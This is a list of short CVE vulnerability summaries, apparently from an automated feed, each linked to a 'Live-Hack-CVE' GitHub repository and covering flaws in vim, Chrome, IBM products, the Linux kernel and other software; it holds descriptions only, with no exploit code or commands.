**The Web Client component of TIBCO Software Inc.'s TIBCO Nimbus contains an easily exploitable vulnerability that allows an unauthenticated attacker with network access to exploit an open redirect on the affected system. A successful attack using this vulnerability requires human interaction from a person other than the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41559](https://github.com/Live-Hack-CVE/CVE-2022-41559) create time: 2022-12-27T21:06:03Z

**Buffer Over-read in function grab_file_name in GitHub repository vim/vim prior to 8.2.4956. This vulnerability is capable of crashing the software, memory modification, and possible remote execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1720](https://github.com/Live-Hack-CVE/CVE-2022-1720) create time: 2022-12-27T21:05:59Z

**Integer Overflow or Wraparound in GitHub repository vim/vim prior to 9.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2285](https://github.com/Live-Hack-CVE/CVE-2022-2285) create time: 2022-12-27T21:05:55Z

**Use After Free in GitHub repository vim/vim prior to 9.0.0246. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2946](https://github.com/Live-Hack-CVE/CVE-2022-2946) create time: 2022-12-27T21:05:51Z

**Use After Free in GitHub repository vim/vim prior to 9.0.0389. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3134](https://github.com/Live-Hack-CVE/CVE-2022-3134) create time: 2022-12-27T21:05:47Z

**Use after free in append_command in GitHub repository vim/vim prior to 8.2.4895. This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1616](https://github.com/Live-Hack-CVE/CVE-2022-1616) create time: 2022-12-27T21:05:43Z

**Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0483. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3234](https://github.com/Live-Hack-CVE/CVE-2022-3234) create time: 2022-12-27T21:05:39Z

**A NULL pointer dereference flaw was found in the Linux kernel’s X.25 set of standardized network protocols functionality in the way a user terminates their session using a simulated Ethernet card and continued usage of this connection. This flaw allows a local user to crash the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1516](https://github.com/Live-Hack-CVE/CVE-2022-1516) create time: 2022-12-27T21:05:35Z

**Out-of-bounds Read in GitHub repository vim/vim prior to 8.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1851](https://github.com/Live-Hack-CVE/CVE-2022-1851) create time: 2022-12-27T21:05:31Z

**Use After Free in GitHub repository vim/vim prior to 8.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1898](https://github.com/Live-Hack-CVE/CVE-2022-1898) create time: 2022-12-27T21:05:28Z

**Use After Free in GitHub repository vim/vim prior to 8.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1968](https://github.com/Live-Hack-CVE/CVE-2022-1968) create time: 2022-12-27T21:05:23Z

**Passeo is an open source python password generator. Versions prior to 1.0.5 rely on the python `random` library for random value selection. The python `random` library warns that it should not be used for security purposes due to its reliance on a non-cryptographically secure random number generator. As a result a moti CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23472](https://github.com/Live-Hack-CVE/CVE-2022-23472) create time: 2022-12-27T21:05:20Z

**Markdown Preview Enhanced v0.6.5 and v0.19.6 for VSCode and Atom was discovered to contain a command injection vulnerability via the PDF file import function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45025](https://github.com/Live-Hack-CVE/CVE-2022-45025) create time: 2022-12-27T21:05:15Z

**An issue in Markdown Preview Enhanced v0.6.5 and v0.19.6 for VSCode and Atom allows attackers to execute arbitrary commands during the GFM export process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45026](https://github.com/Live-Hack-CVE/CVE-2022-45026) create time: 2022-12-27T21:05:12Z

**Cross-site scripting vulnerability in Aficio SP 4210N firmware versions prior to Web Support 1.05 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37406](https://github.com/Live-Hack-CVE/CVE-2022-37406) create time: 2022-12-27T21:05:08Z

**In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41622](https://github.com/Live-Hack-CVE/CVE-2022-41622) create time: 2022-12-27T21:05:05Z

**Insufficient validation of untrusted input in VPN in Google Chrome on ChromeOS prior to 106.0.5249.62 allowed a local attacker to bypass managed device restrictions via physical access to the device. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3312](https://github.com/Live-Hack-CVE/CVE-2022-3312) create time: 2022-12-27T21:05:01Z

**Use after free in Speech Recognition in Google Chrome prior to 107.0.5304.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3886](https://github.com/Live-Hack-CVE/CVE-2022-3886) create time: 2022-12-27T21:04:57Z

**Heap buffer overflow in Crashpad in Google Chrome on Android prior to 107.0.5304.106 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3890](https://github.com/Live-Hack-CVE/CVE-2022-3890) create time: 2022-12-27T21:04:54Z

**Use after free in V8 in Google Chrome prior to 107.0.5304.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3885](https://github.com/Live-Hack-CVE/CVE-2022-3885) create time: 2022-12-27T21:04:47Z

**Use after free in Web Workers in Google Chrome prior to 107.0.5304.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3887](https://github.com/Live-Hack-CVE/CVE-2022-3887) create time: 2022-12-27T21:04:17Z

**Type confusion in V8 in Google Chrome prior to 107.0.5304.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3889](https://github.com/Live-Hack-CVE/CVE-2022-3889) create time: 2022-12-27T21:04:13Z

**Use after free in WebCodecs in Google Chrome prior to 107.0.5304.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3888](https://github.com/Live-Hack-CVE/CVE-2022-3888) create time: 2022-12-27T21:04:09Z

**Use after free in logging in Google Chrome prior to 106.0.5249.62 allowed a remote attacker who had compromised a WebUI process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3314](https://github.com/Live-Hack-CVE/CVE-2022-3314) create time: 2022-12-27T21:04:05Z

**Type confusion in Blink in Google Chrome prior to 106.0.5249.62 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3315](https://github.com/Live-Hack-CVE/CVE-2022-3315) create time: 2022-12-27T21:04:01Z

**Incorrect security UI in full screen in Google Chrome prior to 106.0.5249.62 allowed a remote attacker to spoof security UI via a crafted HTML page. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3313](https://github.com/Live-Hack-CVE/CVE-2022-3313) create time: 2022-12-27T21:03:58Z

**GE CIMPICITY versions 2022 and prior is vulnerable when data from faulting address controls code flow starting at gmmiObj!CGmmiOptionContainer, which could allow an attacker to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2002](https://github.com/Live-Hack-CVE/CVE-2022-2002) create time: 2022-12-27T19:38:52Z

**Cross-site scripting (XSS) vulnerability in classes/ui.class.php in dotProject 2.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the login parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2006-3240](https://github.com/Live-Hack-CVE/CVE-2006-3240) create time: 2022-12-27T20:19:19Z

**ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before 9.9.1-P3, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P3 allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a long resource record. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-4244](https://github.com/Live-Hack-CVE/CVE-2012-4244) create time: 2022-12-27T19:41:34Z

**Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code by leveraging an unspecified "type confusi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0985](https://github.com/Live-Hack-CVE/CVE-2016-0985) create time: 2022-12-27T20:17:05Z

**The xc2028_set_config function in drivers/media/tuners/tuner-xc2028.c in the Linux kernel before 4.6 allows local users to gain privileges or cause a denial of service (use-after-free) via vectors involving omission of the firmware name from a certain data structure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7913](https://github.com/Live-Hack-CVE/CVE-2016-7913) create time: 2022-12-27T20:14:26Z

**security/keys/big_key.c in the Linux kernel before 4.8.7 mishandles unsuccessful crypto registration in conjunction with successful key-type registration, which allows local users to cause a denial of service (NULL pointer dereference and panic) or possibly have unspecified other impact via a crafted application that u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-9313](https://github.com/Live-Hack-CVE/CVE-2016-9313) create time: 2022-12-27T20:13:46Z

**The join_pthread function in stream.c in liblrzip.so in lrzip 0.631 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted archive. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-8843](https://github.com/Live-Hack-CVE/CVE-2017-8843) create time: 2022-12-27T20:18:20Z

**au_channel.h in HE-AAC+ Codec (aka libaacplus) 2.0.2 has a left-shift undefined behavior issue, which might allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted audio file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7604](https://github.com/Live-Hack-CVE/CVE-2017-7604) create time: 2022-12-27T20:18:16Z

**au_channel.h in HE-AAC+ Codec (aka libaacplus) 2.0.2 has a signed integer overflow, which might allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted audio file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7603](https://github.com/Live-Hack-CVE/CVE-2017-7603) create time: 2022-12-27T20:18:13Z

**The Goodix GT9xx touchscreen driver for custom Linux kernels on Xiaomi daisy-o-oss and daisy-p-oss as used in Mi A2 Lite and RedMi6 pro devices through 2018-08-27 has a NULL pointer dereference in kfree after a kmalloc failure in gtp_read_Color in drivers/input/touchscreen/gt917d/gt9xx.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19939](https://github.com/Live-Hack-CVE/CVE-2018-19939) create time: 2022-12-27T20:18:06Z

**IBM DataPower Gateway 2018.4.1.0 through 2018.4.1.6, 7.6.0.0 through 7.6.0.15 and IBM MQ Appliance 8.0.0.0 through 8.0.0.12, 9.1.0.0 through 9.1.0.2, and 9.1.1 through 9.1.2 could allow a local attacker to execute arbitrary commands on the system, caused by a command injection vulnerability. IBM X-Force ID: 16188. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4294](https://github.com/Live-Hack-CVE/CVE-2019-4294) create time: 2022-12-27T19:40:24Z

**IBM Business Automation Workflow V18.0.0.0 through V18.0.0.2 and IBM Business Process Manager V8.6.0.0 through V8.6.0.0 Cumulative Fix 2018.03, V8.5.7.0 through V8.5.7.0 Cumulative Fix 2017.06, and V8.5.6.0 through V8.5.6.0 CF2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary Ja CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4149](https://github.com/Live-Hack-CVE/CVE-2019-4149) create time: 2022-12-27T19:40:17Z

**IBM Spectrum Protect Servers 7.1 and 8.1 and Storage Agents could allow a local attacker to gain elevated privileges on the system, caused by loading a specially crafted library loaded by the dsmqsan module. By setting up such a library, a local attacker could exploit this vulnerability to gain root privileges on the v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4088](https://github.com/Live-Hack-CVE/CVE-2019-4088) create time: 2022-12-27T20:18:40Z

**IBM Spectrum Protect Operations Center 7.1 and 8.1 could allow a remote attacker to obtain sensitive information, caused by an error message containing a stack trace. By creating an error with a stack trace, an attacker could exploit this vulnerability to potentially obtain details on the Operations Center architecture CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4129](https://github.com/Live-Hack-CVE/CVE-2019-4129) create time: 2022-12-27T20:18:26Z

**IBM Cloud Automation Manager 3.1.2 could allow a malicious user on the client side (with access to client computer) to run a custom script. IBM X-Force ID: 158278. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4133](https://github.com/Live-Hack-CVE/CVE-2019-4133) create time: 2022-12-27T20:15:46Z

**IBM Cloud Automation Manager 3.1.2 could allow a user to be impropertly redirected and obtain sensitive information rather than receive a 404 error message. IBM X-Force ID: 158274. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4132](https://github.com/Live-Hack-CVE/CVE-2019-4132) create time: 2022-12-27T20:15:42Z

**IBM Cloud Private 2.1.0, 3.1.0, and 3.1.1 could disclose highly sensitive information in installer logs that could be use for further attacks against the system. IBM X-Force ID: 158115. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4116](https://github.com/Live-Hack-CVE/CVE-2019-4116) create time: 2022-12-27T20:15:38Z

**IBM Cloud Private 3.1.1 and 3.1.2 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 158116. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4117](https://github.com/Live-Hack-CVE/CVE-2019-4117) create time: 2022-12-27T20:15:35Z

**IBM Cloud Private 3.1.1 and 3.1.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 158146. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4120](https://github.com/Live-Hack-CVE/CVE-2019-4120) create time: 2022-12-27T20:15:32Z

**IBM QRadar SIEM 7.2 and 7.3 could allow a local user to obtain sensitive information when exporting content that could aid an attacker in further attacks against the system. IBM X-Force ID: 156563. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4054](https://github.com/Live-Hack-CVE/CVE-2019-4054) create time: 2022-12-27T20:15:28Z

**IBM Multicloud Manager 3.1.0, 3.1.1, and 3.1.2 ibm-mcm-chart could allow a local attacker with admin privileges to obtain highly sensitive information upon deployment. IBM X-Force ID: 158144. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4118](https://github.com/Live-Hack-CVE/CVE-2019-4118) create time: 2022-12-27T20:15:25Z

**IBM Maximo Asset Management 7.6 could allow a physical user of the system to obtain sensitive information from a previous user of the same machine. IBM X-Force ID: 156311. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4048](https://github.com/Live-Hack-CVE/CVE-2019-4048) create time: 2022-12-27T20:15:21Z

**IBM Jazz Reporting Service (JRS) 6.0.6 could allow an authenticated user to access the execution log files as a guest user, and obtain the information of the server execution. IBM X-Force ID: 156243. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4047](https://github.com/Live-Hack-CVE/CVE-2019-4047) create time: 2022-12-27T20:15:17Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 and 6.0.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 157110 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4076](https://github.com/Live-Hack-CVE/CVE-2019-4076) create time: 2022-12-27T20:15:03Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 and 6.0.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 157111 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4077](https://github.com/Live-Hack-CVE/CVE-2019-4077) create time: 2022-12-27T20:14:47Z

**IBM Content Navigator 2.0.3 and 3.0CD could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that woul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4092](https://github.com/Live-Hack-CVE/CVE-2019-4092) create time: 2022-12-27T20:14:43Z

**IBM Tivoli Storage Productivity Center (IBM Spectrum Control Standard Edition 5.2.1 through 5.2.17) could allow a remote attacker to execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 157063. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4071](https://github.com/Live-Hack-CVE/CVE-2019-4071) create time: 2022-12-27T20:14:08Z

**IBM Intelligent Operations Center (IOC) 5.1.0 through 5.2.0 does not properly validate file types, allowing an attacker to upload malicious content. IBM X-Force ID: 157014. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4069](https://github.com/Live-Hack-CVE/CVE-2019-4069) create time: 2022-12-27T20:13:53Z

**IBM Maximo Asset Management 7.6 Work Centers' application does not validate file type upon upload, allowing attackers to upload malicious files. IBM X-Force ID: 156565. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4056](https://github.com/Live-Hack-CVE/CVE-2019-4056) create time: 2022-12-27T20:13:38Z

**IBM Intelligent Operations Center (IOC) 5.1.0 through 5.2.0 is vulnerable to user enumeration, allowing an attacker to brute force into the system. IBM X-Force ID: 157013. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4068](https://github.com/Live-Hack-CVE/CVE-2019-4068) create time: 2022-12-27T20:13:34Z

**IBM Tivoli Storage Productivity Center (IBM Spectrum Control Standard Edition 5.2.1 through 5.2.17) allows users to remain idle within the application even when a user has logged out. Utilizing the application back button users can remain logged in as the current user for a short period of time, therefore users are pre CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4072](https://github.com/Live-Hack-CVE/CVE-2019-4072) create time: 2022-12-27T19:43:26Z

**IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 Admin console is vulnerable to a Client-side HTTP parameter pollution vulnerability. IBM X-Force ID: 160243. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4271](https://github.com/Live-Hack-CVE/CVE-2019-4271) create time: 2022-12-27T19:42:37Z

**IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 Admin Console is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4270](https://github.com/Live-Hack-CVE/CVE-2019-4270) create time: 2022-12-27T19:42:33Z

**IBM MQ 7.1.0.0 - 7.1.0.9, 7.5.0.0 - 7.5.0.9, 8.0.0.0 - 8.0.0.11, 9.0.0.0 - 9.0.0.6, 9.1.0.0 - 9.1.0.2, and 9.1.1 - 9.1.2 is vulnerable to a denial of service attack caused by a memory leak in the clustering code. IBM X-Force ID: 158337. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4141](https://github.com/Live-Hack-CVE/CVE-2019-4141) create time: 2022-12-27T19:42:30Z

**IBM Sterling File Gateway 2.2.0.0 through 6.0.1.0 displays sensitive information in HTTP requests which could be used in further attacks against the system. IBM X-Force ID: 160503. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4280](https://github.com/Live-Hack-CVE/CVE-2019-4280) create time: 2022-12-27T19:42:26Z

**IBM Sterling File Gateway 2.2.0.0 through 6.0.1.0 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 158413. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4147](https://github.com/Live-Hack-CVE/CVE-2019-4147) create time: 2022-12-27T19:42:12Z

**IBM Jazz for Service Management 1.1.3 is vulnerable to HTTP header injection, caused by incorrect trust in the HTTP Host header during caching. By sending a specially crafted HTTP GET request, a remote attacker could exploit this vulnerability to inject arbitrary HTTP headers, which will allow the attacker to conduct v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4186](https://github.com/Live-Hack-CVE/CVE-2019-4186) create time: 2022-12-27T19:42:09Z

**IBM Cognos Controller 10.3.0, 10.3.1, 10.4.0, and 10.4.1 does not set the secure attribute on authorization tokens or session cookies. This could allow an attacker to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 158876. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4171](https://github.com/Live-Hack-CVE/CVE-2019-4171) create time: 2022-12-27T19:42:06Z

**IBM Cognos Controller 10.3.0, 10.3.1, 10.4.0, and 10.4.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 158880. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4175](https://github.com/Live-Hack-CVE/CVE-2019-4175) create time: 2022-12-27T19:41:59Z

**IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 160201. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4268](https://github.com/Live-Hack-CVE/CVE-2019-4268) create time: 2022-12-27T19:41:55Z

**The IBM Spectrum Protect 7.1 and 8.1 Backup-Archive Client is vulnerable to a buffer overflow. This could allow execution of arbitrary code on the local system or the application to crash. IBM X-Force ID: 160200. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4267](https://github.com/Live-Hack-CVE/CVE-2019-4267) create time: 2022-12-27T19:41:31Z

**IBM Jazz for Service Management 1.1.3, 1.1.3.1, and 1.1.3.2 is missing function level access control that could allow a user to delete authorized resources. IBM X-Force ID: 159033. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4194](https://github.com/Live-Hack-CVE/CVE-2019-4194) create time: 2022-12-27T19:41:27Z

**Libraw before 0.20.1 has a stack buffer overflow via LibRaw::identify_process_dng_fields in identify.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24870](https://github.com/Live-Hack-CVE/CVE-2020-24870) create time: 2022-12-27T20:13:49Z

**libass 0.15.x before 0.15.1 has a heap-based buffer overflow in decode_chars (called from decode_font and process_text) because the wrong integer data type is used for subtraction. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36430](https://github.com/Live-Hack-CVE/CVE-2020-36430) create time: 2022-12-27T19:43:22Z

**A flaw was found in darkhttpd. Invalid error handling allows remote attackers to cause denial-of-service by accessing a file with a large modification date. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25691](https://github.com/Live-Hack-CVE/CVE-2020-25691) create time: 2022-12-27T19:39:17Z

**A vulnerability was found in annyshow DuxCMS 2.1. It has been classified as problematic. This affects an unknown part of the file admin.php&r=article/AdminContent/edit of the component Article Handler. The manipulation of the argument content leads to cross site scripting. It is possible to initiate the attack remotely CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36609](https://github.com/Live-Hack-CVE/CVE-2020-36609) create time: 2022-12-27T19:37:12Z

**A vulnerability was found in annyshow DuxCMS 2.1. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36610](https://github.com/Live-Hack-CVE/CVE-2020-36610) create time: 2022-12-27T19:36:47Z

**A heap-based buffer overflow vulnerability exists in Academy Software Foundation OpenEXR 2.3.0 in chunkOffsetReconstruction in ImfMultiPartInputFile.cpp that can cause a denial of service via a crafted EXR file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16587](https://github.com/Live-Hack-CVE/CVE-2020-16587) create time: 2022-12-27T19:35:04Z

**A head-based buffer overflow exists in Academy Software Foundation OpenEXR 2.3.0 in writeTileData in ImfTiledOutputFile.cpp that can cause a denial of service via a crafted EXR file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16589](https://github.com/Live-Hack-CVE/CVE-2020-16589) create time: 2022-12-27T19:35:00Z

**A Null Pointer Deference issue exists in Academy Software Foundation OpenEXR 2.3.0 in generatePreview in makePreview.cpp that can cause a denial of service via a crafted EXR file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16588](https://github.com/Live-Hack-CVE/CVE-2020-16588) create time: 2022-12-27T19:34:56Z

**Due to improper sanitization of user input on Windows, the static file handler allows for directory traversal, allowing an attacker to read files outside of the target directory that the server has permission to read. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36565](https://github.com/Live-Hack-CVE/CVE-2020-36565) create time: 2022-12-27T19:33:21Z

**** DISPUTED ** The web management console of CheckMK Enterprise Edition (versions 1.5.0 to 2.0.0p9) does not properly sanitise the uploading of ".mkp" files, which are Extension Packages, making remote code execution possible. Successful exploitation requires access to the web management interface, either with valid cr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40905](https://github.com/Live-Hack-CVE/CVE-2021-40905) create time: 2022-12-27T20:18:37Z

**sqclass.cpp in Squirrel through 2.2.5 and 3.x through 3.1 allows an out-of-bounds read (in the core interpreter) that can lead to Code Execution. If a victim executes an attacker-controlled squirrel script, it is possible for the attacker to break out of the squirrel script sandbox even if all dangerous functionality s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41556](https://github.com/Live-Hack-CVE/CVE-2021-41556) create time: 2022-12-27T20:18:09Z

**lxml is a library for processing XML and HTML in the Python language. Prior to version 4.6.5, the HTML Cleaner in lxml.html lets certain crafted script content pass through, as well as script content in SVG files embedded using data URIs. Users that employ the HTML cleaner in a security relevant context should upgrade CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43818](https://github.com/Live-Hack-CVE/CVE-2021-43818) create time: 2022-12-27T20:17:47Z

**MDB Tools (aka mdbtools) 0.9.2 has a stack-based buffer overflow (at 0x7ffd0c689be0) in mdb_numeric_to_string (called from mdb_xfer_bound_data and _mdb_attempt_bind). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45926](https://github.com/Live-Hack-CVE/CVE-2021-45926) create time: 2022-12-27T20:17:44Z

**MDB Tools (aka mdbtools) 0.9.2 has a stack-based buffer overflow (at 0x7ffd6e029ee0) in mdb_numeric_to_string (called from mdb_xfer_bound_data and _mdb_attempt_bind). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45927](https://github.com/Live-Hack-CVE/CVE-2021-45927) create time: 2022-12-27T20:17:40Z

**A WordPress plugin and several WordPress themes developed by AccessPress Themes are vulnerable to malicious file uploads via the plugin_offline_installer AJAX action due to a missing capability check in the plugin_offline_installer_callback function found in the /demo-functions.php file or /welcome.php file of the affe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39317](https://github.com/Live-Hack-CVE/CVE-2021-39317) create time: 2022-12-27T20:17:33Z

**** DISPUTED ** Python 3.x through 3.10 has an open redirection vulnerability in lib/http/server.py due to no protection against multiple (/) at the beginning of URI path which may leads to information disclosure. NOTE: this is disputed by a third party because the http.server.html documentation page states "Warning: ht CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28861](https://github.com/Live-Hack-CVE/CVE-2021-28861) create time: 2022-12-27T20:17:30Z

**SerenityOS fixed as of c9f25bca048443e317f1994ba9b106f2386688c3 contains a buffer overflow vulnerability in LibTextCode through opening a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28874](https://github.com/Live-Hack-CVE/CVE-2021-28874) create time: 2022-12-27T20:17:20Z

**A race condition existed in the snapd 2.54.2 snap-confine binary when preparing a private mount namespace for a snap. This could allow a local attacker to gain root privileges by bind-mounting their own contents inside the snap's private mount namespace and causing snap-confine to execute arbitrary code and hence gain CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44731](https://github.com/Live-Hack-CVE/CVE-2021-44731) create time: 2022-12-27T20:16:38Z

**The EventCalendar WordPress plugin before 1.1.51 does not have proper authorisation and CSRF checks in the add_calendar_event AJAX actions, allowing users with a role as low as subscriber to create events CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25025](https://github.com/Live-Hack-CVE/CVE-2021-25025) create time: 2022-12-27T20:14:36Z

**Under certain circumstances a CCURE Portal user could enumerate user accounts in CCURE 9000 version 2.90 and prior versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36201](https://github.com/Live-Hack-CVE/CVE-2021-36201) create time: 2022-12-27T20:14:33Z

